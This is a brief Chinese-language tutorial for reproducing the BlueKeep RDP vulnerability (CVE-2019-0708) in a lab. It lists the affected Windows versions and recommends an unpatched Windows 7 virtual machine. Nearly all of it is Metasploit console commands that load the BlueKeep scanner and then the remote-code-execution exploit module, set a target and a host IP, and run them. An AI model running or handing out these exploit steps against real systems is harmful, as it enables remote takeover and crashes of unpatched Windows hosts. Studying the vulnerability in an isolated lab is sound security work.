1.影响范围
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP
———————————————— 2.复现操作2.0 提前准备好一个没有打补丁的win7系统(虚拟机和物理机都可以,推荐虚拟机,不要使用自己拿下的服务器,蓝屏后果无法预测)2.2 打开msf,并搜索0708
msfconsole
search 0708 2.3 使用扫描模块(scanner)
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
set rhost 192.168.237.131 //这里的ip填写自己win7主机的ip
run
2.4 进行利用
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show targets //选择目标主机类型 这里我选择了7601 -vmware 15
set target 4
set rhost 192.168.237.131
run